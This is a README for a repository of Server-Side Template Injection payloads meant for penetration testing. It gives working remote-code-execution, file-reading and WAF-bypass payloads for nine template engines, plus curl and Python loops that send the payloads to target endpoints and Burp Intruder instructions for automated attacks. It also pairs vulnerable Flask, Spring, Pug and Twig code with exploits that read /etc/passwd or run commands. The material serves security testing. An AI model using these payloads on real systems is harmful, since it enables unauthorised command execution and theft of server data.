Comprehensive Server-Side Template Injection (SSTI) Security Testing Payload Collection
- Overview
- What is SSTI?
- Features
- Supported Template Engines
- Installation
- Usage
- Payload Categories
- Burp Suite Intruder Usage
- Example Scenarios
- Security and Ethical Use
- Contributing
- References
- License
This repository contains a comprehensive collection of payloads for detecting and exploiting Server-Side Template Injection (SSTI) vulnerabilities during penetration testing and security assessments. It includes over 2000 carefully curated and tested payloads.
git clone https://github.com/payload-box/ssti-advanced-payload-list.git
cd ssti-advanced-payload-listServer-Side Template Injection (SSTI) is a critical security vulnerability that allows an attacker to inject malicious code into the template engine used by a web application. This vulnerability occurs when user input is not properly sanitized before being processed by the template engine.
- 🔴 Remote Code Execution (RCE): Execute arbitrary commands on the server
- 🔴 Data Leakage: Unauthorized access to sensitive files and data
- 🔴 System Compromise: Full server control
- 🔴 Privilege Escalation: Privilege escalation attacks
- 🔴 Information Disclosure: Access to system configuration and environment variables
- ✅ 2000+ Payloads: Comprehensive and continuously updated payload collection
- ✅ 10+ Template Engines: Specialized payloads for popular template engines
- ✅ Burp Suite Compatible: Formats optimized for Intruder
- ✅ Polyglot Payloads: Payloads that work across multiple template engines
- ✅ Bypass Techniques: WAF and filter bypass payloads
- ✅ Categorized: Organized by template engine
- ✅ RCE Focused: Optimized for remote code execution
- ✅ File Reading: Payloads for accessing sensitive files
- ✅ Cross-Platform: Payloads for Linux, Windows, macOS
- ✅ Up-to-Date and Active: Continuously updated with new techniques
- Jinja2 (Flask, Django)
- 132 unique payloads
- RCE, file read, information disclosure
- Filter bypass techniques
-
Twig (Symfony)
- 158 unique payloads
- System command execution
- File manipulation payloads
-
Smarty
- 238 unique payloads
- PHP code execution
- Comprehensive bypass techniques
-
Thymeleaf (Spring Boot)
- 164 unique payloads
- Runtime.exec() exploitation
- ProcessBuilder techniques
-
FreeMarker
- 161 unique payloads
- Execute utility exploitation
- ObjectConstructor techniques
-
Velocity (Apache)
- 269 unique payloads
- ClassLoader manipulation
- Reflection-based RCE
- ERB (Ruby on Rails)
- 184 unique payloads
- System command execution
- File I/O operations
-
Pug/Jade (Node.js)
- 226 unique payloads
- child_process exploitation
- require() abuse
-
EJS (Express.js)
- 200 unique payloads
- Process manipulation
- File system access
- Multi-Engine Payloads
- 171 unique payloads
- Cross-platform compatibility
- Multiple template engine support
# Clone the repository
git clone https://github.com/payload-box/ssti-advanced-payload-list.git
# Navigate to directory
cd ssti-advanced-payload-list
# List payload files
ls Intruder/- Open Burp Suite
- Go to Intruder tab
- Select Payloads tab
- Click "Load" button
- Select relevant payload file (e.g.,
Intruder/jinja2-flask.txt)
- Template Engine Detection: Identify the template engine used by the target application
- Payload Selection: Choose the relevant payload file
- Testing: Send payloads to the target parameter
- Analysis: Analyze responses and verify the vulnerability
# Simple test with cURL
curl -X POST https://target.com/vulnerable \
-d "name={{7*7}}"
# Reading payloads from file
while read payload; do
curl -X POST https://target.com/search \
-d "query=$payload" \
--silent | grep -i "49\|error\|exception"
done < Intruder/jinja2-flask.txtimport requests
# Read payload file
with open('Intruder/jinja2-flask.txt', 'r') as f:
payloads = f.readlines()
# Test each payload
for payload in payloads:
payload = payload.strip()
response = requests.post(
'https://target.com/vulnerable',
data={'input': payload}
)
# Check for successful injection
if '49' in response.text or 'root:' in response.text:
print(f"[+] Vulnerable: {payload}")Basic mathematical operations to detect SSTI presence:
{{7*7}} → 49
${7*7} → 49
<%= 7*7 %> → 49
{7*7} → 49
Collect system information:
{{config}}
${T(java.lang.System).getenv()}
<%= ENV %>
{$smarty.server}
#{process.env}
Read sensitive files:
{{''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read()}}
${new java.util.Scanner(new java.io.File('/etc/passwd')).useDelimiter('\\Z').next()}
<%= File.read('/etc/passwd') %>
{php}echo file_get_contents('/etc/passwd');{/php}
Execute system commands:
{{lipsum.__globals__['os'].popen('id').read()}}
${T(java.lang.Runtime).getRuntime().exec('id')}
<%= system('id') %>
{php}system('id');{/php}
${"freemarker.template.utility.Execute"?new()("id")}
#set($x='')#set($rt=$x.class.forName('java.lang.Runtime'))#set($ex=$rt.getRuntime().exec('id'))
#{process.mainModule.require('child_process').execSync('id').toString()}
Filter and WAF bypass techniques:
{{''['\x5f\x5fclass\x5f\x5f']}}
{{lipsum|attr('\x5f\x5fglobals\x5f\x5f')}}
{{''.__class__.__mro__[2].__subclasses__()[396]('cat${IFS}/etc/passwd',shell=True,stdout=-1).communicate()[0].strip()}}
${T(java.lang.Runtime).getRuntime().exec('cat$IFS/etc/passwd')}
Works across multiple template engines:
{{7*7}}${7*7}<%= 7*7 %>{7*7}
{{config}}${_self}<%= self %>{$smarty}
POST /search HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
query=§test§
- Mark injection point with
§§in Positions tab - Go to Payloads tab
- Payload type: Simple list
- Payload Options: Load → Select relevant payload file
- Payload Encoding: Enable URL-encode if needed
- Click Start attack button
- Filter responses:
- Status code: 200, 500
- Length differences
- Regex:
(49|root:|uid=|gid=|groups=)
✓ If "49" appears in response → {{7*7}} executed
✓ If "root:x:0:0" appears → /etc/passwd was read
✓ If "uid=33(www-data)" appears → RCE successful
Vulnerability:
@app.route('/hello/<name>')
def hello(name):
template = f"<h1>Hello {name}!</h1>"
return render_template_string(template)Payload:
{{lipsum.__globals__['os'].popen('cat /etc/passwd').read()}}
Result: Contents of /etc/passwd file are returned.
Vulnerability:
@GetMapping("/welcome")
public String welcome(@RequestParam String name, Model model) {
model.addAttribute("name", name);
return "welcome";
}Payload:
${T(java.lang.Runtime).getRuntime().exec('whoami')}
Result: System username is executed.
Vulnerability:
app.get('/profile', (req, res) => {
const username = req.query.username;
const html = pug.render(`h1 Welcome ${username}`);
res.send(html);
});Payload:
#{process.mainModule.require('child_process').execSync('ls -la').toString()}
Result: Directory contents are listed.
Vulnerability:
$template = $twig->createTemplate("Hello {{ name }}!");
echo $template->render(['name' => $_GET['name']]);Payload:
{{['cat /etc/passwd']|filter('system')}}
Result: /etc/passwd file is read.
Payloads in this repository are for educational and authorized penetration testing purposes only.
✅ DO:
- Test only on systems you are authorized to test
- Obtain written permission (penetration testing contract)
- Take backups before testing
- Keep test results confidential
- Report findings responsibly (Responsible Disclosure)
❌ DON'T:
- Attack systems without authorization
- Test public systems
- Steal or modify data
- Damage systems
- Conduct unauthorized security tests
All legal and ethical responsibility for the use of these tools belongs to the user. The author(s) cannot be held responsible for misuse of these payloads. Check local laws and regulations before use.
We welcome your contributions! To contribute to this project:
- Fork the repository
- Create a feature branch (
git checkout -b feature/amazing-payloads) - Commit your changes (
git commit -m 'Add amazing payloads') - Push your branch (
git push origin feature/amazing-payloads) - Open a Pull Request
- 🆕 Adding new payloads
- 🐛 Fixing broken payloads
- 📝 Documentation improvements
- 🔧 Adding template engine support
- 🌐 Translation contributions
- 💡 New bypass techniques
- Test the payload and verify it works
- Add to the relevant template engine file
- Add descriptive comments (if needed)
- Avoid duplicate payloads
- Update README (if needed)
- PortSwigger - Server-Side Template Injection
- OWASP - Server-Side Template Injection
- HackTricks - SSTI (Server Side Template Injection)
- PayloadsAllTheThings - SSTI
- Jinja2 Documentation
- Twig Documentation
- Thymeleaf Documentation
- FreeMarker Documentation
- Velocity Documentation
- ERB Documentation
- Pug Documentation
- EJS Documentation
- Smarty Documentation
Total Payloads: 2000+
Template Engines: 10+
File Size: ~500KB
Languages: Python, PHP, Java, Ruby, JavaScript
Last Updated: 2024
Contributors: Open Source Community
- GraphQL SSTI payloads
- Go template payloads
- Rust template payloads
- ASP.NET Razor payloads
- Automated testing scripts
- Docker test environment
- Interactive web interface
- Payload obfuscation techniques
- AI-powered payload generation
- 📧 Email: [Contact repository owner]
- 🐛 Issues: GitHub Issues
- 💬 Discussions: GitHub Discussions
- 🐦 Twitter: [@payload_box]
- 💼 LinkedIn: [Payload Box]
This project is licensed under the MIT License.
MIT License
Copyright (c) 2024 Payload Box
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Thanks to everyone who contributed to this project:
- Security research community
- Open source contributors
- Bug hunters and penetration testers
- Template engine developers
- Everyone who reported issues and suggested improvements
- "Web Application Hacker's Handbook"
- "The Tangled Web"
- "Breaking and Entering"
Made with ❤️ by Security Researchers | For Educational Purposes Only
Stay Legal • Stay Ethical • Stay Secure
